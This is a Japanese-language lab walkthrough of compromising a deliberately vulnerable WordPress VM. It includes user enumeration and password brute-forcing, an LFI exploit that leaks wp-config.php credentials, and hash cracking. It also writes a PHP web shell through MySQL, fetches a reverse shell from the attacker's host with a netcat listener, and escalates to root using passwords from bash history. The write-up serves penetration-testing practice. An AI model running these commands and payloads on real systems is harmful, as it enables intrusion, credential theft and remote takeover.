| Last Updated: 2018-06-12T00:00:00.000Z
| Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/trope/readme.txt
| [!] The version is out of date, the latest version is 1.2
| Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/trope/style.css
| Style Name: Trope
| Style URI: http://wpdean.com/trope-wordpress-theme/
| Description: Trope is a free WordPress theme that comes with clean, modern, minimal and fully responsive design w...
| Author: WPDean
| Author URI: http://wpdean.com/
|
| Found By: Known Locations (Aggressive Detection)
| - https://10.10.10.14:12380/blogblog/wp-content/themes/trope/, status: 500
|
| Version: 1.1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - https://10.10.10.14:12380/blogblog/wp-content/themes/trope/style.css, Match: 'Version: 1.1.0'
[+] twentyfifteen
| Location: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/
| Last Updated: 2020-03-31T00:00:00.000Z
| Readme: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 2.6
| Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/style.css
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/, status: 500
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 1.1'
[+] twentyfourteen
| Location: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfourteen/
| Last Updated: 2020-03-31T00:00:00.000Z
| [!] The version is out of date, the latest version is 2.8
| Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfourteen/style.css
| Style Name: Twenty Fourteen
| Style URI: https://wordpress.org/themes/twentyfourteen/
| Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfourteen/, status: 500
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - https://10.10.10.14:12380/blogblog/wp-content/themes/twentyfourteen/style.css, Match: 'Version: 1.4'
[+] twentythirteen
| Location: https://10.10.10.14:12380/blogblog/wp-content/themes/twentythirteen/
| Last Updated: 2020-03-31T00:00:00.000Z
| [!] The version is out of date, the latest version is 3.0
| Style URL: https://10.10.10.14:12380/blogblog/wp-content/themes/twentythirteen/style.css
| Style Name: Twenty Thirteen
| Style URI: https://wordpress.org/themes/twentythirteen/
| Description: The 2013 theme for WordPress takes us back to the blog, featuring a full range of post formats, each...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - https://10.10.10.14:12380/blogblog/wp-content/themes/twentythirteen/, status: 500
|
| Version: 1.5 (80% confidence)
| Found By: Style (Passive Detection)
| - https://10.10.10.14:12380/blogblog/wp-content/themes/twentythirteen/style.css, Match: 'Version: 1.5'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=========================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] John Smith
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By: Rss Generator (Passive Detection)
[+] peter
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] john
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] elly
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] barry
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] heather
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] garry
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] harry
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] scott
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] kathy
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] tim
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
[+] Finished: Tue May 12 03:35:34 2020
[+] Requests Done: 20974
[+] Cached Requests: 52
[+] Data Sent: 5.399 MB
[+] Data Received: 3.296 MB
[+] Memory used: 276.891 MB
[+] Elapsed time: 00:00:43
とりあえずパスワードクラック狙ってみたけど、
# wpscan --disable-tls-checks --url https://10.10.10.14:12380/blogblog/ -U peter,john,elly,barry,heather,garry,harry,scott,kathy,tim -P /usr/share/wordlists/rockyou.txt (snip) [+] Performing password attack on Xmlrpc Multicall against 10 user/s [SUCCESS] - garry / football [SUCCESS] - harry / monkey [SUCCESS] - scott / cookie [SUCCESS] - kathy / coolgirl ^Cogress Time: 00:28:58 < > (675 / 172827) 0.39% ETA: ??:??:?? [!] Valid Combinations Found: | Username: garry, Password: football | Username: harry, Password: monkey | Username: scott, Password: cookie | Username: kathy, Password: coolgirl [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Tue May 12 04:38:01 2020 [+] Requests Done: 727 [+] Cached Requests: 5 [+] Data Sent: 226.524 KB [+] Data Received: 69.015 MB [+] Memory used: 1.379 GB [+] Elapsed time: 00:29:23 Scan Aborted: Canceled by User
長いのでやめた。
分かった中にはadminはいなかったので、テーマ等弄れず。
脆弱性プラグインが見つかれば、先に進めそうな気がするけど見つからんかったしなぁ。
とここで気づき↓
enumerate all plugins is not working · Issue #1222 · wpscanteam/wpscan
え、オプション付けないとplugin検出できないことがあるのか。
早速試行
# wpscan --disable-tls-checks --url https://10.10.10.14:12380/blogblog/ -e ap --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.1
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
(snip)
[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:02:44 <===================================> (86467 / 86467) 100.00% Time: 00:02:44
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] advanced-video-embed-embed-videos-or-playlists
| Location: https://10.10.10.14:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
| Latest Version: 1.0 (up to date)
| Last Updated: 2015-10-14T13:52:00.000Z
| Readme: https://10.10.10.14:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://10.10.10.14:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/, status: 200
|
| Version: 1.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://10.10.10.14:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
[+] akismet
| Location: https://10.10.10.14:12380/blogblog/wp-content/plugins/akismet/
| Latest Version: 4.1.5
| Last Updated: 2020-04-29T13:02:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - https://10.10.10.14:12380/blogblog/wp-content/plugins/akismet/, status: 403
|
| The version could not be determined.
[+] shortcode-ui
| Location: https://10.10.10.14:12380/blogblog/wp-content/plugins/shortcode-ui/
| Last Updated: 2019-01-16T22:56:00.000Z
| Readme: https://10.10.10.14:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
| [!] The version is out of date, the latest version is 0.7.4
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://10.10.10.14:12380/blogblog/wp-content/plugins/shortcode-ui/, status: 200
|
| Version: 0.6.2 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - https://10.10.10.14:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
[+] two-factor
| Location: https://10.10.10.14:12380/blogblog/wp-content/plugins/two-factor/
| Latest Version: 0.5.2
| Last Updated: 2020-04-30T14:02:00.000Z
| Readme: https://10.10.10.14:12380/blogblog/wp-content/plugins/two-factor/readme.txt
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - https://10.10.10.14:12380/blogblog/wp-content/plugins/two-factor/, status: 200
|
| The version could not be determined.
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
[+] Finished: Tue May 12 03:54:35 2020
[+] Requests Done: 86518
[+] Cached Requests: 13
[+] Data Sent: 23.032 MB
[+] Data Received: 11.735 MB
[+] Memory used: 404.73 MB
[+] Elapsed time: 00:03:10
プラグイン出た。
これらの4つのプラグインを検索すると「two-factor」は無し、「akismet」はバージョンが分からないので無視、「shortcode」はどれもバージョン的に刺さらなそうだった。
# searchsploit advanced video wordpress
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
WordPress Plugin Advanced Video 1.0 - Local File Inclusion | exploits/php/webapps/39646.py
(snip)
LFIでやっていくしかない。
しかしこのexploitの使い方が分からず。
curlでやる。
# curl -k https://10.10.10.14:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost\&title=32000\&short=rnd\&term=rnd\&thumb=../wp-config.php https://10.10.10.14:12380/blogblog/?p=280 # curl -k https://10.10.10.14:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost\&title=32000\&short=rnd\&term=rnd\&thumb=../wp-config.php https://10.10.10.14:12380/blogblog/?p=300
しかしやったところで謎URLが返ってくるのみ。
失敗かと思ったが、「/blogblog/」に戻るとcurlした分だけ謎jpegが投稿されている?
このポストされてる記事がどこにあるのか調べた結果。
「/wp-content/uploads/」にあった。
参考 [Where can I find the directory of all my posts/articles in WordPress? - Stack Overflow]
(https://stackoverflow.com/questions/42590267/where-can-i-find-the-directory-of-all-my-posts-articles-in-wordpress)
https://$IP:12380/blogblog/wp-content/uploads/
アクセスするとjpegをダウンロードできるので、curlで一つ落としてみる。
# curl -k -O https://10.10.10.14:12380/blogblog/wp-content/uploads/463030943.jpeg # file 463030943.jpeg 463030943.jpeg: PHP script, ASCII text
php?
# cat 463030943.jpeg
<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, and ABSPATH. You can find more information by visiting
* {@link https://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
* Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'plbkac');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'V 5p=[.Vds8~SX;>t)++Tt57U6{Xe`T|oW^eQ!mHr }]>9RX07W<sZ,I~`6Y5-T:');
define('SECURE_AUTH_KEY', 'vJZq=p.Ug,]:<-P#A|k-+:;JzV8*pZ|K/U*J][Nyvs+}&!/#>4#K7eFP5-av`n)2');
define('LOGGED_IN_KEY', 'ql-Vfg[?v6{ZR*+O)|Hf OpPWYfKX0Jmpl8zU<cr.wm?|jqZH:YMv;zu@tM7P:4o');
define('NONCE_KEY', 'j|V8J.~n}R2,mlU%?C8o2[~6Vo1{Gt+4mykbYH;HDAIj9TE?QQI!VW]]D`3i73xO');
define('AUTH_SALT', 'I{gDlDs`Z@.+/AdyzYw4%+<WsO-LDBHT}>}!||Xrf@1E6jJNV={p1?yMKYec*OI$');
define('SECURE_AUTH_SALT', '.HJmx^zb];5P}hM-uJ%^+9=0SBQEh[[*>#z+p>nVi10`XOUq (Zml~op3SG4OG_D');
define('LOGGED_IN_SALT', '[Zz!)%R7/w37+:9L#.=hL:cyeMM2kTx&_nP4{D}n=y=FQt%zJw>c[a+;ppCzIkt;');
define('NONCE_SALT', 'tb(}BfgB7l!rhDVm{eK6^MSN-|o]S]]axl4TE_y+Fi5I-RxN/9xeTsK]#ga_9:hJ');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each a unique
* prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
define('WP_HTTP_BLOCK_EXTERNAL', true);
さっきのexploitの中身全然読んでなかったけど、LFIってこういうことだったのか。
アクセスしたファイルの中身をjpegファイルとしてテキストファイルに出力するということか。
とりあえず「wp-config.php」のおかげでmysqlにアクセスできそう。
wordpressにadminログインしてページ改ざんを目指す。
# mysql -h 10.10.10.14 -u root -p Enter password: Welcome to the MariaDB monitor. Commands end with ; or \g. Your MySQL connection id is 945 Server version: 5.7.12-0ubuntu1 (Ubuntu) Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MySQL > show databases; +--------------------+ | Database | +--------------------+ | information_schema | | loot | | mysql | | performance_schema | | phpmyadmin | | proof | | sys | | wordpress | +--------------------+ 8 rows in set (0.001 sec) MySQL > use wordpress; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MySQL [wordpress]> show tables; +-----------------------+ | Tables_in_wordpress | +-----------------------+ | wp_commentmeta | | wp_comments | | wp_links | | wp_options | | wp_postmeta | | wp_posts | | wp_term_relationships | | wp_term_taxonomy | | wp_terms | | wp_usermeta | | wp_users | +-----------------------+ 11 rows in set (0.001 sec) MySQL [wordpress]> select * from wp_users; +----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+ | ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name | +----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+ | 1 | John | $P$B7889EMq/erHIuZapMB8GEizebcIy9. | john | john@red.localhost | http://localhost | 2016-06-03 23:18:47 | | 0 | John Smith | | 2 | Elly | $P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 | elly | Elly@red.localhost | | 2016-06-05 16:11:33 | | 0 | Elly Jones | | 3 | Peter | $P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 | peter | peter@red.localhost | | 2016-06-05 16:13:16 | | 0 | Peter Parker | | 4 | barry | $P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 | barry | barry@red.localhost | | 2016-06-05 16:14:26 | | 0 | Barry Atkins | | 5 | heather | $P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 | heather | heather@red.localhost | | 2016-06-05 16:18:04 | | 0 | Heather Neville | | 6 | garry | $P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 | garry | garry@red.localhost | | 2016-06-05 16:18:23 | | 0 | garry | | 7 | harry | $P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 | harry | harry@red.localhost | | 2016-06-05 16:18:41 | | 0 | harry | | 8 | scott | $P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 | scott | scott@red.localhost | | 2016-06-05 16:18:59 | | 0 | scott | | 9 | kathy | $P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 | kathy | kathy@red.localhost | | 2016-06-05 16:19:14 | | 0 | kathy | | 10 | tim | $P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 | tim | tim@red.localhost | | 2016-06-05 16:19:29 | | 0 | tim | | 11 | ZOE | $P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 | zoe | zoe@red.localhost | | 2016-06-05 16:19:50 | | 0 | ZOE | | 12 | Dave | $P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. | dave | dave@red.localhost | | 2016-06-05 16:20:09 | | 0 | Dave | | 13 | Simon | $P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 | simon | simon@red.localhost | | 2016-06-05 16:20:35 | | 0 | Simon | | 14 | Abby | $P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. | abby | abby@red.localhost | | 2016-06-05 16:20:53 | | 0 | Abby | | 15 | Vicki | $P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 | vicki | vicki@red.localhost | | 2016-06-05 16:21:14 | | 0 | Vicki | | 16 | Pam | $P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0 | pam | pam@red.localhost | | 2016-06-05 16:42:23 | | 0 | Pam | +----+------------+------------------------------------+---------------+-----------------------+------------------+---------------------+---------------------+-------------+-----------------+ 16 rows in set (0.001 sec)
wordpressのパスワードをリークできるのでパスワード解析できる形式に出力する。
MySQL [wordpress]> select concat_ws(':', user_login, user_pass) from wp_users into outfile '/var/www/https/blogblog/wp-content/uploads/passwd.txt';
Query OK, 16 rows affected (0.010 sec)
# curl -k https://10.10.10.14:12380/blogblog/wp-content/uploads/passwd.txt John:$P$B7889EMq/erHIuZapMB8GEizebcIy9. Elly:$P$BlumbJRRBit7y50Y17.UPJ/xEgv4my0 Peter:$P$BTzoYuAFiBA5ixX2njL0XcLzu67sGD0 barry:$P$BIp1ND3G70AnRAkRY41vpVypsTfZhk0 heather:$P$Bwd0VpK8hX4aN.rZ14WDdhEIGeJgf10 garry:$P$BzjfKAHd6N4cHKiugLX.4aLes8PxnZ1 harry:$P$BqV.SQ6OtKhVV7k7h1wqESkMh41buR0 scott:$P$BFmSPiDX1fChKRsytp1yp8Jo7RdHeI1 kathy:$P$BZlxAMnC6ON.PYaurLGrhfBi6TjtcA0 tim:$P$BXDR7dLIJczwfuExJdpQqRsNf.9ueN0 ZOE:$P$B.gMMKRP11QOdT5m1s9mstAUEDjagu1 Dave:$P$Bl7/V9Lqvu37jJT.6t4KWmY.v907Hy. Simon:$P$BLxdiNNRP008kOQ.jE44CjSK/7tEcz0 Abby:$P$ByZg5mTBpKiLZ5KxhhRe/uqR.48ofs. Vicki:$P$B85lqQ1Wwl2SqcPOuKDvxaSwodTY131 Pam:$P$BuLagypsIJdEuzMkf20XyS5bRm00dQ0
全員分出力したけどID的にjohnがadminぽいのでjohnのパスワードだけ分かれば良さそう。
# curl -k https://10.10.10.14:12380/blogblog/wp-content/uploads/passwd.txt | grep John > pass # john --wordlist=/usr/share/wordlists/rockyou.txt pass Using default input encoding: UTF-8 Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3]) Cost 1 (iteration count) is 8192 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status incorrect (John) 1g 0:00:00:12 DONE (2020-05-12 06:04) 0.07961g/s 14721p/s 14721c/s 14721C/s ipod22..iloveafi Use the "--show --format=phpass" options to display all of the cracked passwords reliably Session completed
これでwordpressにadmin権限でログインできたので、いつも通りAppearanc->Editorのやつをお好みで書き換える。
今回は「404.php」を書き換える。
「404.php」を丸ごと「/usr/share/webshells/php/php-reverse-shell.php」に書きかえる。
# cp /usr/share/webshells/php/php-reverse-shell.php reverse.php # vim reverse.php
と思ったけど、今回のwordpressはテーマの書き換えができないらしい。
なぜだ。
mysqlからwebshell仕込む方針に変えていく。
webshellを仕込む。
# mysql -h 10.10.10.14 -u root -p Enter password: Welcome to the MariaDB monitor. Commands end with ; or \g. Your MySQL connection id is 1013 Server version: 5.7.12-0ubuntu1 (Ubuntu) Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MySQL [(none)]> select "<?php passthru($_GET['cmd']); ?>" into outfile '/var/www/https/blogblog/wp-content/uploads/shell.php'; Query OK, 1 row affected (0.001 sec)
reverse-shellをダウンロードする。
window 1 # python -m SimpleHTTPServer 80
window 2 # curl -k https://10.10.10.14:12380/blogblog/wp-content/uploads/shell.php?cmd=wget+10.10.10.3/reverse.php
window 1 # nc -nlvp 8080
window 2
curl -k https://10.10.10.14:12380/blogblog/wp-content/uploads/reverse.php
window 1
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux 20:37:56 up 7:59, 0 users, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python -c "import pty;pty.spawn('/bin/bash')" www-data@red:/$
shell getchu! 他のwordpressプラグインチェック方法
curl https://10.10.10.14:12380/blogblog/wp-content/plugins/ -k -s | html2text
## after shell getchu cronも見た。<br> kernel exploitも試した。<br> なかなか刺さらなかった。全然分からなかった。<br> 最後にコレ
www-data@red:/home$ cat /.bash_history cat /.bash_history exit free exit exit exit exit exit exit exit exit id whoami ls -lah pwd ps aux sshpass -p thisimypassword ssh JKanode@localhost apt-get install sshpass sshpass -p JZQuyIN5 peter@localhost ps -ef top kill -9 3747 exit exit exit exit exit whoami exit exit exit exit exit exit exit exit exit id exit top ps aux exit exit exit exit cat: peter/.bash_history: Permission denied top exit
「.bash_history」かぁ~~。<br> JKanodeにはsudo権限なかったけど、peterにはありました。
ssh peter@10.10.10.14
(snip) red% sudo -l
We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for peter: Matching Defaults entries for peter on red: lecture=always, env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User peter may run the following commands on red:
(ALL : ALL) ALL
red% sudo su
➜ peter ls
➜ peter id
uid=0(root) gid=0(root) groups=0(root)
➜ peter cd /root
➜ ~ ls
fix-wordpress.sh flag.txt issue python.sh wordpress.sql
➜ ~ cat flag.txt
<(Congratulations)>
.-'''''-.
|'-----'|
|-.....-|
| |
| |
,. | |
__.o o"-. | |
.-O o "-.o O )_,._ | |
( o O o )--.-"O o"-.'-----'
'--------' ( o O o)
----------
b6b545dc11b7a270f4bad23432190c75162c4a2b
➜ ~ exit
## 終わり - 軽くrabbit holeを体験した気がする(まだ甘々か) - もしかして今までやってたwordpressのテーマ改ざんってあまりできない?
